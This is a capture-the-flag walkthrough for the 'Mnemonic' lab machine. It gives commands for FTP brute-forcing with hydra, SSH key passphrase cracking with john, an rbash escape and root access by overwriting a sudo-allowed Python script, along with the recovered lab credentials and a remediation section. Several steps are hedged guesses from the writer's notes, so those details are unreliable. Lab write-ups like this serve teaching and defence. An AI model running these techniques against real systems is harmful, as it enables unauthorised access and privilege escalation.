Target IP: mnemonic.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User (condor) & Root (root.txt) Flags

1. Executive Summary

“Mnemonic” is a Linux machine that emphasizes cryptography and OSINT skills. Initial access requires enumerating web directories to find backup files, which leak a hint for FTP credentials. Brute-forcing FTP grants access to an encrypted SSH key, which is cracked to gain a restricted shell (rbash) as user james. Lateral movement involves decoding a “Mnemonic” image-based encryption scheme to recover the password for user condor. Privilege escalation is achieved by exploiting a misconfigured sudo permission on a Python script (examplecode.py), allowing for a root shell spawn.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port scanning.
  • T1078 (Valid Accounts): Cracking FTP and SSH credentials.
  • T1059.004 (Unix Shell): Escaping Restricted Bash (rbash).
  • T1027 (Obfuscated Files or Information): Decoding Mnemonic image encryption.
  • T1548.003 (Sudo and Sudo Caching): Exploiting sudo rights on a writable script.

2. Operational Setup

Host Configuration

echo "10.10.x.x mnemonic.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Your scan revealed the standard services, but SSH is on a non-standard port.

  • 21/tcp (FTP): vsftpd 3.0.3.
  • 80/tcp (HTTP): Apache.
  • 1337/tcp (SSH): OpenSSH.

B. Web Enumeration

  • Robots.txt: Disallows /webmasters/*.
  • Directories: Accessing /webmasters/ reveals /admin and /backups.
  • The Leak: Inside /backups, a zip file (or text file) contains a note:
James new ftp username: ftpuser
we have to work hard

C. Credential Attacks (FTP)

We have a username ftpuser but no password.

hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://mnemonic.thm
  • Result: ftpuser : love4ever.

4. Initial Access: SSH

A. FTP Loot

Logging into FTP reveals an SSH private key (id_rsa).

  1. Download: get id_rsa.
  2. Crack Passphrase:
ssh2john id_rsa > key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt key.hash
  • Result: bluelove.

B. Login & Rbash Escape

We log in as james on port 1337.

ssh -i id_rsa james@mnemonic.thm -p 1337
  • Constraint: We land in a restricted shell (rbash).
  • Escape: Common escape techniques include using editors (vi) or SSH flags.
# SSH Escape technique
ssh -i id_rsa james@mnemonic.thm -p 1337 -t "bash --noprofile"

(Note: If -t works, you get a clean shell immediately. Otherwise, exporting PATH /bin:/usr/bin usually works if allowed).


5. Lateral Movement: Condor (The Mnemonic)

A. Enumeration

Files in james home directory:

  • note.txt: Hints at “Mnemonic Image based name”.
  • 6450.txt: A list of numbers.

Checking the /home/condor directory (which james can curiously list partially due to permissions on the folder itself or leaked filenames):

ls -la /home/condor

You found two base64 encoded filenames:

  1. Flag Hint: VEhNe2E1Zj... -> THM{...} (This looks like a flag, likely a distractor or User flag).
  2. The Image URL: aHR0cHM6... -> https://i.ytimg.com/vi/K-96JmC2AkE/maxresdefault.jpg.

B. The Crypto Challenge

The note mentions Mnemonic. A quick Google search for “Mnemonic image encryption github” leads to MustafaTanguner/Mnemonic.

The Logic: This tool encodes text into an image (pixels) or numbers. We have a list of numbers in 6450.txt.

Decryption:

  1. Clone the Mnemonic tool.
  2. Run the decryption script against the number list.
python3 mnemonic.py -d -f 6450.txt

(Or typically, the tool takes the image and the numbers to reconstruct the data).

Result:

  • User: condor
  • Password: pasificbell1981

C. Switch User

su condor
# Password: pasificbell1981

Status: User condor.


6. Privilege Escalation: Python Script

Enumeration

We check sudo privileges.

sudo -l
# (root) /usr/bin/python3 /bin/examplecode.py

The Vulnerability

We inspect /bin/examplecode.py.

  • Permissions: It is likely writable by condor OR it imports a library we can hijack.
  • Your Method: You mentioned editing the file.
echo 'import os; os.system("/bin/bash")' > /bin/examplecode.py

Exploitation

sudo /usr/bin/python3 /bin/examplecode.py

Result: Root shell spawned.

Root Flag: You noted the flag was MD5 encoded.

cat /root/root.txt
# Output: [MD5 Hash]

(Sometimes CTFs leave the flag as a hash to prove you read it, or you need to decrypt it. In this room, the hash is the flag).


7. Remediation (Blue Team)

  1. SSH Port: Changing the SSH port to 1337 is “Security by Obscurity.” Use standard ports with key-based auth and disable password auth.
  2. Restricted Shells: rbash is easily bypassed if the user can execute editors (vi, nano) or if SSH allows command injection (-t "bash"). Ensure strict configuration.
  3. Sudo Rights:
  • Never allow users to run scripts (examplecode.py) as root if the user has write access to the script file.
  • Use chown root:root and chmod 700 for admin scripts.
  1. Information Leakage:
  • Remove backup files (/backups) from web-accessible directories.
  • Do not store hints about usernames (ftpuser) in plain text.